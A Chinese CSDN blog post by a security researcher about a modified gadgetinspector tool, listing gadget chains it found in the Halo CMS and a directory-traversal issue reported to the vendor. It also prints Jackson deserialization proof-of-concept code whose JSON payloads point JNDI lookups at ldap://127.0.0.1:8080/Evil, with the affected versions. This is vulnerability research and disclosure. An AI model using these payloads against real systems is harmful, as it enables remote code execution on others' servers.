使用gadgetinspector挖掘漏洞

最新推荐文章于 2024-05-08 09:34:19 发布
最新推荐文章于 2024-05-08 09:34:19 发布
阅读量494 收藏
点赞数 1
分类专栏: 安全 工具 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/116723227
版权
安全 同时被 2 个专栏收录
58 篇文章 17 订阅
订阅专栏
工具
29 篇文章 3 订阅
订阅专栏

说明

抽空二次改造了一下gadgetinspector,参考我前面写的文章
1、gadget inspector 挖掘利用链
2、gadgetinspectot改造

改造后的源码见github,欢迎star,不定期更新该工具。目前更新如下:
1、修复了一些bug,如漏洞类的子类无法被挖掘等。
2、优化了一些功能,如slink点、利用链等。
3、增加了一些功能,识别函数注解、参数注解等。
4、增加了web项目扫描模块,可以用来扫描web项目的漏洞,source点为路由入口。

使用🌰

然后使用该工具的web扫描模块扫描了一下开源cms框架halo,发现了如下利用链

run/halo/app/controller/admin/api/BackupController.getMarkdownBackup(Ljava/lang/String;)Lrun/halo/app/model/dto/BackupDTO; (0)
  java/nio/file/Paths.get(Ljava/lang/String;[Ljava/lang/String;)Ljava/nio/file/Path; (0)

run/halo/app/controller/admin/api/BackupController.getDataBackup(Ljava/lang/String;)Lrun/halo/app/model/dto/BackupDTO; (0)
  java/nio/file/Paths.get(Ljava/lang/String;[Ljava/lang/String;)Ljava/nio/file/Path; (0)

run/halo/app/controller/admin/api/BackupController.getWorkDirBackup(Ljava/lang/String;)Lrun/halo/app/model/dto/BackupDTO; (0)
  java/nio/file/Paths.get(Ljava/lang/String;[Ljava/lang/String;)Ljava/nio/file/Path; (0)

javax/xml/ws/handler/MessageContext$Scope.valueOf(Ljava/lang/String;)Ljavax/xml/ws/handler/MessageContext$Scope; (0)
  java/lang/Enum.valueOf(Ljava/lang/Class;Ljava/lang/String;)Ljava/lang/Enum; (0)
  java/lang/Class.enumConstantDirectory()Ljava/util/Map; (0)
  java/lang/Class.getEnumConstantsShared()[Ljava/lang/Object; (0)
  java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

com/sun/xml/internal/ws/handler/HandlerProcessor.closeHandlers(Ljavax/xml/ws/handler/MessageContext;II)V (0)
  java/util/logging/Logger.log(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V (0)
  java/util/logging/Logger.doLog(Ljava/util/logging/LogRecord;)V (0)
  java/util/logging/Logger.getEffectiveLoggerBundle()Ljava/util/logging/Logger$LoggerBundle; (0)
  java/util/logging/Logger.findResourceBundle(Ljava/lang/String;Z)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.getBundle(Ljava/lang/String;Ljava/util/Locale;Ljava/lang/ClassLoader;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.getBundleImpl(Ljava/lang/String;Ljava/util/Locale;Ljava/lang/ClassLoader;Ljava/util/ResourceBundle$Control;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.findBundle(Ljava/util/ResourceBundle$CacheKey;Ljava/util/List;Ljava/util/List;ILjava/util/ResourceBundle$Control;Ljava/util/ResourceBundle;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.findBundleInCache(Ljava/util/ResourceBundle$CacheKey;Ljava/util/ResourceBundle$Control;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle$Control.needsReload(Ljava/lang/String;Ljava/util/Locale;Ljava/lang/String;Ljava/lang/ClassLoader;Ljava/util/ResourceBundle;J)Z (0)
  java/net/URL.openConnection()Ljava/net/URLConnection; (0)

com/sun/xml/internal/ws/handler/HandlerTube.closeServersideHandlers(Ljavax/xml/ws/handler/MessageContext;)V (0)
  com/sun/xml/internal/ws/handler/HandlerProcessor.closeHandlers(Ljavax/xml/ws/handler/MessageContext;II)V (0)
  java/util/logging/Logger.log(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V (0)
  java/util/logging/Logger.doLog(Ljava/util/logging/LogRecord;)V (0)
  java/util/logging/Logger.getEffectiveLoggerBundle()Ljava/util/logging/Logger$LoggerBundle; (0)
  java/util/logging/Logger.findResourceBundle(Ljava/lang/String;Z)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.getBundle(Ljava/lang/String;Ljava/util/Locale;Ljava/lang/ClassLoader;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.getBundleImpl(Ljava/lang/String;Ljava/util/Locale;Ljava/lang/ClassLoader;Ljava/util/ResourceBundle$Control;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.findBundle(Ljava/util/ResourceBundle$CacheKey;Ljava/util/List;Ljava/util/List;ILjava/util/ResourceBundle$Control;Ljava/util/ResourceBundle;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle.findBundleInCache(Ljava/util/ResourceBundle$CacheKey;Ljava/util/ResourceBundle$Control;)Ljava/util/ResourceBundle; (0)
  java/util/ResourceBundle$Control.needsReload(Ljava/lang/String;Ljava/util/Locale;Ljava/lang/String;Ljava/lang/ClassLoader;Ljava/util/ResourceBundle;J)Z (0)
  java/net/URL.openConnection()Ljava/net/URLConnection; (0)

我们主要看第一个利用链

run/halo/app/controller/admin/api/BackupController.getMarkdownBackup(Ljava/lang/String;)Lrun/halo/app/model/dto/BackupDTO; (0)
  java/nio/file/Paths.get(Ljava/lang/String;[Ljava/lang/String;)Ljava/nio/file/Path; (0)

跟进它的代码run.halo.app.controller.admin.api.BackupController#getWorkDirBackup
在这里插入图片描述
跟进run.halo.app.service.impl.BackupServiceImpl#getBackup函数,该函数会对路径或者文件名是否存在进行判断
在这里插入图片描述
没法任意文件下载,但是可以实现目录或文件遍历:
在这里插入图片描述
在这里插入图片描述
后面白盒随便看了下功能,发现很多xss,就不赘述了,模板注入问题可以说一下,payload如下
在这里插入图片描述
访问不存在页面,使得漏洞触发:
在这里插入图片描述
上面漏洞皆已报给厂商

比如还挖到几个jsckson的0day:

ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String json = "[\"com.caucho.quercus.servlet.QuercusServlet\",{\"jndiDatabase\":\"ldap://127.0.0.1:8080/Evil\"}]";
Object o = mapper.readValue(json, Object.class);
mapper.writeValueAsString(o);

String json = "[\"com.caucho.config.types.EjbRef\",{\"lookupName\":\"ldap://127.0.0.1:8080/Evil\"}]";

String json = "[\"com.caucho.config.types.EnvEntry\",{\"lookupName\":\"ldap://127.0.0.1:8080/Evil\"}]";

条件:

JDK: 1.8.0_101

reproduce version:
	jackson-databind-2.11.4.jar
	jackson-core-2.11.4.jar
	jackson-annotations-2.11.4.jar
	
dependencies:
	quercus-4.0.65.jar(https://repo1.maven.org/maven2/com/caucho/quercus/4.0.65/)
	cdi-api-1.0.jar

不过由于只适用于老版本,所以官方没认。

5wimming
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
GadgetInspector原理分析
JAVAQXQ的博客
07-29 387
是在上发布的一个自动化反序列化链挖掘工具,它通过对字节码形式的JAVA项目进行污点分析,挖掘可能存在的反序列化链。我们从GadgetInspector的源代码进行分析。六个部分层层递进,最终完成反序列化链挖掘。...
使用动态代理,抽取Service公共代码
IF
04-12 979
原业务层代码: AccountServiceImpl_OLD.java public class AccountServiceImpl_OLD implements AccountService { private AccountDao accountDao; private TransactionManager transactionManager; // 实现se...
java inspector_Gadgetinspector:一款针对Java应用程序库的字节码分析工具
weixin_39954569的博客
02-17 113
原标题:Gadgetinspector:一款针对Java应用程序库的字节码分析工具 GadgetinspectorGadgetinspector是一款针对Java应用程序/库的字节码分析工具,它可以帮助研究人员寻找和分析Java应用程序中的反序列化小工具链(Gadget Chain)。该项目可以检查Java代码库和类路径中的Gadget链,而Gadget链可以被用来构造针对反序列化漏洞漏洞利用技...
探秘Java安全:强大而实用的GadgetInspector
最新发布
gitblog_00079的博客
05-08 297
探秘Java安全:强大而实用的GadgetInspector 项目地址:https://gitcode.com/5wimming/gadgetinspector 在网络安全的世界里,对于Java应用的安全性审查从未停止。今天,我们向你推荐一个令人瞩目的开源项目——GadgetInspector。这个项目专注于Java库的深度分析,能够帮助开发者发现并预防序列化漏洞,通过自动化的方式构造exploi...
gadgetinspector学习
公众号shadow sock7
10-30 542
参考threedr3am大佬的讲解: 改造gadgetinspector篇-自动化挖掘Fastjson gadget chain git clone https://github.com/threedr3am/gadgetinspector cd gadgetinspector ./gradlew shadowJar # 执行 java -jar build/libs/gadget-inspector-all.jar --config fastjson /c/Users/Administrator/.
Gadget Inspector: ClojureScript Data Browser-crx插件
04-02
语言:English 浏览ClojureScript数据的内容,浏览和还原历史原子状态。 小工具检查器是devtools扩展,它添加了一个面板,您可以在其中浏览通过`gadget.inspector / inspect`传递的正在运行的应用程序中的任何数据-伴随库中的函数-https://github.com/cjohansen/gadget -检查员。
基于混合分析的Java反序列化利用链挖掘方法
05-14
Java 反序列化漏洞及其利用链挖掘 Java 反序列化漏洞是近年来Java应用程序安全领域的一大威胁。当Java对象的序列化表示被不安全地反序列化时,攻击者可以利用这些漏洞执行恶意代码,从而对系统造成严重破坏。反序列...
基于Java ASM技术和GadgetInspector的原理,尝试实现一个自动Java代码审计工具。目前做到了可控.zip
03-23
Java ASM技术是Java字节码操纵和分析框架,它允许开发者动态生成类或者增强已有类的...在实现过程中,我们需要深入理解Java字节码、反序列化机制,以及ASM和GadgetInspector的使用方式,这样才能有效地进行代码审计。
java一阶段笔试题-gadgetinspector:用于在Java应用程序中查找反序列化小工具链的字节码分析器
06-17
通过自动发现应用程序的类路径中可能的小工具链,渗透测试人员可以快速构建漏洞,应用程序安全工程师可以评估反序列化漏洞的影响并确定修复的优先级。 该项目曾在 Black Hat USA 2018 上展示。在那里了解更多信息! ...
Gadget Inspector 源码解析
Elegant Coding
10-14 144
推广博客: Gadget Inspector 源码解析
GadgetInspector源码分析
Dokii_i的博客
01-17 456
GadgetInspector是2018年blackhatusa上面发布的一个自动化链子挖掘工具,通过asm的方法来对字节码进行静态的分析,以污点传播的方式来挖掘可能存在的链子,考虑到项目大多获取的都是war,jar包的形式原始的GadgetInspector是不能用来挖掘漏洞的,只能找出source(入口点)→sink链在学习整个项目前,需要读者有asm的基础和字节码的基础,否则比较难看懂。
gadgetinspectot改造
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
03-28 389
接上一篇 gadget inspector 挖掘利用链 这便主要是对gadget inspectot进行了一些改造: 1、修改gadgetinspector.GadgetChainDiscovery#JNDISlink函数,增加满足条件,主要针对函数lookup的条件 private boolean JNDISlink(Handle method, InheritanceMap inheritanceMap) { if ((inheritanceMap.isSubclassOf(method.g
错误 Ljava/lang/String;Ljava/lang/String;)V
dcriori
10-18 6690
org.objectweb.asm.ClassVisitor.visit(ILjava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)V上面的错误出现是因为:asm.jar和cglib.jar的版本不對應,或者是因為用了cglib-full-XX.jar,這裡面已經包含了asm.jar,如果用了cglib-f...
从JDK源码来看XXE的触发原理和对应的防御手段
顶峰
02-20 458
这几天继续在重写GadgetInspector工具,进一步的增强该自动化工具的source点和sink点,同时增强过程中的漏报和误报的问题。这里主要是对其中有关于XXE中的两点sink进行几点分析。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准。
记一次[Ljava/lang/String;Ljava/lang/String;) 错误
Wcybaonier
08-30 9891
起因: 之前写了个CommonUtil.java 作为公共工具类使用 , 但是由于我这个是maven多模块的项目,别的模块之中也出现了一个名字相同的util 导致出现了类冲突的原因 修改: 网上找了好多的解决方案,什么包有没有导错,jar包冲突之类的,为什么这个不行呢, 折腾了好久,突然间一个想法冒了出来,是不是类重复了,自己一看,果然是有一个一模一样的类,在别的包里面, 项目的接构是多个maven子工程,最后合并到一个包内,改完类名以后,问题解决,不会再报此错误 ...
JNI字段描述符“([Ljava/lang/String;)V”
pan_00_hao的专栏
03-01 2294
转自:http://fgsink.blog.163.com/blog/static/16716997020124310169911/ “([Ljava/lang/String;)V” 它是一种对函数返回值和参数的编码。这种编码叫做JNI字段描述符(JavaNative Interface FieldDescriptors)。一个数组int[],就需要表示为这样"[I"。如果多个数组dou
绕过漏洞危害_fastjson 1.2.68 反序列化漏洞 gadget 的一种挖掘思路
weixin_31067983的博客
12-28 1026
关于漏洞fastjson 的这个新漏洞在 1.2.68 及之前版本的 autotype 关闭的情况下仍然可以绕过限制反序列化,相比 1.2.47 版本的漏洞来讲这个版本的漏洞还是有一些限制的(关于 1.2.47 漏洞可以参考我的另一篇文章《Java 反序列化漏洞始末(3)— fastjson》[1]),例如 1.2.47 是可以绕过黑名单的限制的,而这个漏洞则无法绕过黑名单,并且需要类实...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值